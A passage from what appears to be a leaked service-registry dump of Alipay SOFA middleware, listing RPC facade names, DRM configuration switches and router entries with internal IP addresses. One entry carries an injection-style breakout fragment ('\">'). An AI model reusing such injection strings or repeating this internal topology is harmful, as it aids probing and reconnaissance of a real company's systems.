DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.mainMigrateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcheck.common.service.facade.api.JarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSISOP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.cashier.PaymentPreConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.DrilledInjectEventCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.callback.StatusbarCallBackFacade:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcenter.common.service.facade.drill.service.AdcFaultMonkeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:TEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.message.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.SecurityPolicyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:reservemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mypointscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_GUARCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessPolicyService:1.0:uctfront@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpromoprod.facade.activity.VoucherInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskportal.common.service.facade.apps.AppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.snsmessage.api.SnsMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.biz.service.impl.feature.sofarest.FeatureSofaRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.PrizeLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderProtocolConfirmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.membercenterTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zscale.api.PlanQueryFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.AccountModelMigrateDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianMessageLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkedcore.common.service.facade.PipelineExecutionTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.college.openevent.OpenEventQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.28.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.service.facade.api.CertificateSendOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CSROBOTMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:PromoPlatform_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.ChildOutsideClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antfeaturemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finnet@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.CodingRuleService:1.0:codingRuleService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.153.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.dont-load-plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.aclinkedcore.common.service.facade.PipelineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataservice.common.service.facade.FinbatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.125.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insusercenter.facade.policysearch.api.MedicalPolicySearchServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opinioncore.facade.yq.YqCrawlerFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.CostConfirmProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.146.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsecu.common.service.facade.api.bigevent.EventArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.loan.api.FinancingElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AGDSBATCH#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.feedBackAndHelp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.service.drm.CharityClaimConfigDrmHandler.onlineClaimSpNoList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.ukey.facade.UkeyManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antuxsys.facade.QuestionnairePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.notifyUserNewRiskCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accreditcore.common.service.facade.BpmsCallBackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbbuservice.common.service.facade.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.asset.profile.service.impl.CJBProfileServiceImpl.useNewHistoryAsset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_createShopAuditProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.notifySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.acl.IndustryManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.76.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.feature.common.service.facade.sql.service.FeatureCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finlinkanalysis.common.service.facade.bindcard.UserBindCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financingcore.common.service.facade.consult.api.YebContractConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanapply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancenter.common.service.facade.FanacingTemplateFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.CooperatePlantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotbsp.business.facade.bind.DeviceBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileorderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1301#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.182.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.157.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acfeeweb.common.service.facade.CreditBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.funduser.FundUserRelationsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.facade.config.LargeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.campFundTypePidWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.thor.service.ThorStrategyResultSampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.galaxy.FinBatchGalaxyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.inspect.process.DistributeTaskRequestReceiver:1.0:distributeFailureRequestReceiverClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.scene.CrowdMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.IterationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.16.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findecision.common.service.facade.decision.DecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_partnerSaveProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityidentify.service.ackcode.AckCodeSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.204.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbdataquery.common.service.facade.DownloadTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.ebill.facade.Ebill2016QueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.common.shared.facade.spi.HoloxCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanWorkflowFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.DepositViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.ActionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.query.BillAlterQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyUrlFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_169.254.98.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.CommodityCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.LoadTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV4:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iriskfront.common.service.integration.imif.MerchantQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ARGO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:test_async_tr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbusinessprod.common.service.facade.api.BankInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:receivableNotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.index.IndexSignalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.quotawelfare.QuotaWelfareCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.NewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.gw.zfcertifycenter.OcrJsonUploadGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.finaccenter.facade.api.OrgInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.api.rule.ItemRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.limitAmountInCent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.112.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.blackArMsgPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.batchmount.BatchMountOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_P_BLACKLIST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:forexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:minitranscloudDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frboss.facade.api.ChartModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.DCategorySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igdispute.common.service.facade.ArbitrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.reconmmendation.ReconTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.144.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbmemberprod.common.service.facade.api.tr.cg.UserCgTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityEnrolmentUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.level0StoreEventCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.relation.RoleRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.facade.service.ApplicationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\">@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.msgbuild.QuickMsgBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rest.restful.SampleServiceRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.20.147.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:taskFlowControlCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-14#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobiledataprod.service.facade.BTSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.operationconfig.ConfigTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.review.ReviewPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.VerificationTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.fixed.service.facade.FixedPurchaseProtocolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphaq.common.facade.label.api.MarkResultRecallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditagreement.common.service.agreement.general.PcreditGeneralAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.MyBankAccountBizAbilityDRMImpl.openDistributorSplitStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbgrouppurchaseprod.common.service.facade.activity.GroupActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyRelationGraphFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.device.facade.IotDeviceInfoWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.168.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","gfmac@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Zone_Servers_All#@#DEFAULT_INSTANCE_ID#@#msgbroker","DATA_ID_100.88.163.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.course.UserCourseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.doc.ZDocService:1.0:zcorealipayktpdoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.ClusterMappingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeapcore.service.api.TradeCreditFinanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceDbRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.operate.api.SpeechOperateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.inspect.AppFundamentalDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_ZHENGYUAN_DEV#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkfundbuss.common.facade.query.CollectApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditQueryAuthOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.rate.ShopRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.ProdToolOpLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloudinc.common.service.facade.AntvipDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.chaos.dig.facade.CapacityAttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.iad.facade.AssetValuationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_XPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bizfundprod.common.service.facade.payment.tobankcard.PaymentToBankCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mcomment@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpScriptApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.IntimateRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayutrprod.common.facade.link.SystemHaLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.needBlock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.antha.AnthaViewAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.limitcum.CumulateStoreFacade:1.0:zdatacontext-adapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkVideoZoneMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.68.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.ipay.imerchprod.merchant.facade.api.MerchantQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insassetprod.common.service.facade.PetUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.dynamic2.spi.service.Dynamic2ConfigService:1.0:TLX_APPLICATION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.PreAuditFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.pocketmoney.PocketMoneyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.biz.BizFunctionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF